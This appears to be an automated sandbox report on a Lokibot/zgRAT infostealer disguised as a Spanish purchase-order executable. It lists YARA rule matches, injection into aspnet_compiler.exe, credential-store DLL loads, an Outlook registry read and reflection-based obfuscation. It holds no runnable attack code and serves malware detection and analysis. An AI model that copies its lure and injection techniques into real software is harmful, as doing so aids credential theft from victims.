                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000041C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000000.2086513181.0000000000C84000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWindowsFormsApp1.exeB vs rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2116292720.0000000005570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeBinary or memory string: OriginalFilenameWindowsFormsApp1.exeB vs rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, SiOO3t3R5b6SHg7iKj.csCryptographic APIs: 'TransformBlock'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, SiOO3t3R5b6SHg7iKj.csCryptographic APIs: 'TransformFinalBlock'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.csCryptographic APIs: 'CreateDecryptor'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.csCryptographic APIs: 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@1/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPedidodecompra__PO20441__ARIMComponentes.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMutant created: NULL
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe "C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe"
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: BATMAN.pdbxD source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: WindowsFormsApp1.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328577920.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: BATMAN.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{uiQCT4ArHkmBkiUcGXG(typeof(IntPtr).TypeHandle),uiQCT4ArHkmBkiUcGXG(typeof(Type).TypeHandle)})
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, zbHLRJeBpRqbxvO4jX.cs.Net Code: UXZOENPmm System.Reflection.Assembly.Load(byte[])
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, VZclfkIa72LcpRmJj7.cs.Net Code: VZcIlfka7 System.Reflection.Assembly.Load(byte[])
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: section name: .text entropy: 7.375405459723751
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, qdSZcxPNra1tnO6ofV.csHigh entropy of concatenated method names: 'q5CRP2dSZ', 'NQa75Hud7pIQKS8Uek5', 'IoBiNvu0flo4kEbDbwj', 'isP69puA2DYHrKZGsMu', 'vXtf5XuvbulXm5rm9YJ', 'j2FqNKuHLjISt76omO5', 'fqwqgCuyTRQka5CffLt', 'bqsbtVuTZ6RVXmEk3bI'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, SiOO3t3R5b6SHg7iKj.csHigh entropy of concatenated method names: 'jQJX4xDRX', 'Vc0uUhoE6', 'tjawBRewx', 'SiONO3tR5', 'M6SpHg7iK', 'tfNoL1jF3tb1fuNbsIQ', 'TPEH6GjUcPJDcrUltIq', 'b90DKXjp6nyTeywqZvx', 'BMXpgKjtJ8TycgiYxLT', 'mKOyeEjfk5tPnvpjd0f'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, tGpPDjjvI15ahjtZQP.csHigh entropy of concatenated method names: 'aYN6GyA08', 'U7g5Le1rX', 'x7qiOAs08', 'TE5EfZGpP', 'njvLI15ah', 'JU7oADjN7aSXZudev3Z', 'kqOLPtjBeA8pi3hMh35', 'hKZQ40j7d5ELSOv6PaB', 'WAk3GKjeAxejCyaRYhF', 'sPuDQhjmPjI2q7C80oR'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, Form1.csHigh entropy of concatenated method names: 'Dispose', 'IVnemkL1R', 'kx6D9R2IKeFhAXZoIt', 'c6f7NmlOQYhpbWpSp8', 'GJ5jcP8qXwPI0Ipg1J', 'Ep9dF8xaeaeqmYB4br', 'IW2o4Nh0ArrD5opeUt', 'pkvIRTLcew8EDvZvbG', 'T8owIYggojVPiWhIaZ', 'nCOTbZWHDf3gtTcOwD'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, iFkbkSEm4ZkOngNvhj.csHigh entropy of concatenated method names: 'us9IT7wa2S', 'keWqjnu5YP5uFcn5qY7', 'ltoDHauESU0TiZSIe6I', 'yp4LqbuRWo2i6R9R0UJ', 'ufekVnui5HuxQUDiYUT', 'GojIJhuF0dafZ2VeTXD', 'rMbTjPuU6m0hkW81pwJ', 'tHYh38upHuihwcB4rJE', 'G5KQJkutGnQcOVrdSU8', 'aLY4K5uf22nvrjcMjnX'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, zbHLRJeBpRqbxvO4jX.csHigh entropy of concatenated method names: 'DNqS62NfW', 'UXZOENPmm', 'aBDf7ngCq', 'oIBnIqi2G', 'k24EoROA5SV5xF0fO1', 'jR4dHpMdy7QEp0ohvS', 'ikOpMD9BgpPCulqaAk', 'BUCXbiR12uiHh3pAbL', 'dwxYrtiQJMghnWapZL', 'rgwDjx5w7KMqn7EKi2'
